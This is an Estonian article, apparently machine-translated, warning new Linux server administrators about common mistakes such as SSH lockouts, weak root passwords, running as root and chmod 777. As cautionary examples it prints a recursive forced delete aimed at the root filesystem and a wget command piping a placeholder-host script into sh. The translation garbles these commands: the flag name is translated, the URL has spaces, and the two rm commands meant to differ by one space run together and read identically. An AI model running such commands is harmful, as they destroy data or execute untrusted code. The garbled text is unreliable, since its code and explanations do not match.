Linuxi käsurida annab serveriadministraatoritele kontrolli oma serverite ja nendesse salvestatud andmete üle, kuid see ei takista neid hävitavate käskude käitamisel tagajärgedega, mida ei saa tagasi võtta. Andmete juhuslik kustutamine on vaid üks tüüpi vead, mida uued serveriadministraatorid teevad.
Seest võtmete lukustamine
Serveri administraatorid loovad ühenduse serveritega SSH-ga, teenusega, mis töötab tavaliselt porti 22, pakkudes sisselogimiskesta, mille kaudu autentitud kasutajad saavad käske serveriserverites käivitada. Turvalisuse karastamise tavapärane samm on SSH konfigureerimine nii, et see aktsepteeriks ühendusi teises pordis. SSH viimine arvukate juhuslike sadamateni piirab toore jõu rünnakute mõju; häkkerid ei saa proovida pahatahtlikke sisselogimisi, kui nad ei leia porti, mida SSH kuulab.
Kuid administraator, kes konfigureerib SSH-d kuulama teises pordis ja seejärel taaskäivitab SSH-serveri, võib avastada, et lukustatud pole ainult häkkerid. Kui ka serveri tulemüüri pole uues pordis ühenduste lubamiseks ümber seadistatud, ei jõua ühenduse katsed kunagi SSH-serverini. Administraator lukustatakse oma serverist välja ja probleemi lahendamiseks pole muud võimalust, kui avada tugiteenuse pilet oma hostiteenuse pakkuja juures. Kui muudate SSH-porti, avage kindlasti uus port oma serveri tulemüüri konfiguratsioonis.
Kergesti aimatava parooli valimine
Jõhkrate jõudude rünnakud on aimamismäng. Ründaja proovib paljusid kasutajanimesid ja paroole, kuni need tabavad kombinatsiooni, mis neid sisse laseb. Sõnastiku rünnak on täpsem lähenemisviis, mis kasutab paroolide loendeid, mis on sageli välja lekitatud paroolide andmebaasidest. Rünnakud juurkonto vastu on lihtsamad kui teiste kontode vastu, sest ründaja teab juba kasutajanime. Kui juurkontol on lihtne parool, siis saab seda kohe üldse häkkida.
Juurekonto vastu suunatud jõhkra rünnaku ja sõnastiku rünnakute vastu on kolm võimalust.
- Valige pikk ja keeruline parool. Lihtsaid paroole on lihtne murda; pikad ja keerukad paroolid on võimatud.
- Juure sisselogimise keelamiseks konfigureerige SSH. See on lihtne konfiguratsioonimuudatus, kuid veenduge, et „sudo“ on konfigureeritud nii, et teie konto saaks oma õigusi suurendada.
- Kasutage paroolide asemel võtmepõhist autentimist. Sertifikaadipõhised sisselogimised eemaldavad jõhkrate rünnakute riski täielikult.
Käsude kopeerimine, millest te aru ei saa
Stack Exchange, Server Fault ja sarnased saidid on päästerõngas uutele Linuxi süsteemiadministraatoritele, kuid peaksite vältima kiusatust kopeerida ja kleepida shellikäsku, millest te aru ei saa. Mis on nende kahe käsu erinevus?
sudo rm -rf --no-säilita-root / mnt / mydrive /sudo rm -rf --no-säilita-root / mnt / mydrive /
Seda on lihtne näha, kui neid koos kuvatakse, kuid mitte nii lihtne, kui otsite foorumeid ja otsite käsku ühendatud köite sisu kustutamiseks. Esimene käsk kustutab kõik ühendatud draivi failid. Teine käsk kustutab need failid ja kõik serveri juurfailisüsteemis. Ainus erinevus on ruumi enne viimast kaldkriipsu.
Serverihaldurid võivad torujuhtmetega kokku puutuda pikkade käskudega, mis väidetavalt teevad ühte, kuid teevad hoopis midagi muud. Olge eriti ettevaatlik käskudega, mis laadivad koodi Internetist alla.
wget http: // näide.com / verybadscript -O - | sh -See käsk kasutab wget-i skripti allalaadimiseks, mis juhitakse kestale ja käivitatakse. Selle turvaliseks käitamiseks peate mõistma, mida käsk teeb ja mida allalaaditud skript teeb, sealhulgas mis tahes koodi, mille allalaaditud skript võib ise alla laadida.
Sisselogimine juurena
Ehkki tavakasutajad saavad faile muuta ainult oma kodukataloogis, on Linuxi serveris juurkasutajal vähe võimalik. See võib käitada mis tahes tarkvara, lugeda mis tahes andmeid ja kustutada mis tahes faile.
Juurkasutaja juhitud rakendustel on sarnane jõud. Juurdekasutajana on mugav sisse logida, sest te ei pea kogu aeg „sudo” või „su” kasutama, kuid see on ohtlik. Kirjaviga võib teie serveri sekunditega hävitada. Juurkasutaja juhitav lollakas tarkvara võib tekitada katastroofi. Igapäevaste toimingute jaoks logige sisse tavakasutajana ja tõstke juurõiguste hulka ainult siis, kui see on vajalik.
Failisüsteemi õigusi ei õpita
Failisüsteemi õigused võivad uute Linuxi kasutajate jaoks segadust tekitada ja pettumust valmistada. Lubade string nagu „drwxr-xr-x” näib esialgu mõttetu ja õigused võivad takistada failide muutmist ja tarkvara peatada selle, mida soovite.
Süsteemiadministraatorid saavad kiiresti teada, et chmod 777 on maagiline loits, mis lahendab suurema osa neist probleemidest, kuid see on kohutav idee. See võimaldab kõigil, kellel on konto, faili lugeda, kirjutada ja käivitada. Kui käivitate selle käsu veebiserveri kataloogis, palute end häkkida. Linuxi failiload näevad keerulised välja, kuid kui nende töötamise õppimiseks kulub mõni minut, avastate loogilise ja paindliku süsteemi failidele juurdepääsu kontrollimiseks.
Ajastul, mis hindab lihtsaid kasutajakogemusi kõigi muude tegurite ees, jääb Linuxi käsurida otsustavalt keerukaks ja vastupidav lihtsustamisele. Ei saa segi ajada ja loota, et see kõik saab korda. See ei ole korras ja teil on lõpuks käes katastroof.
Kuid kui õpid põhitõdesid - failiõigused, käsurea tööriistad ja nende valikud, turvalisuse parimad tavad -, võid saada ühe kõige võimsama arvutiplatvormi kapteniks, mis kunagi loodud.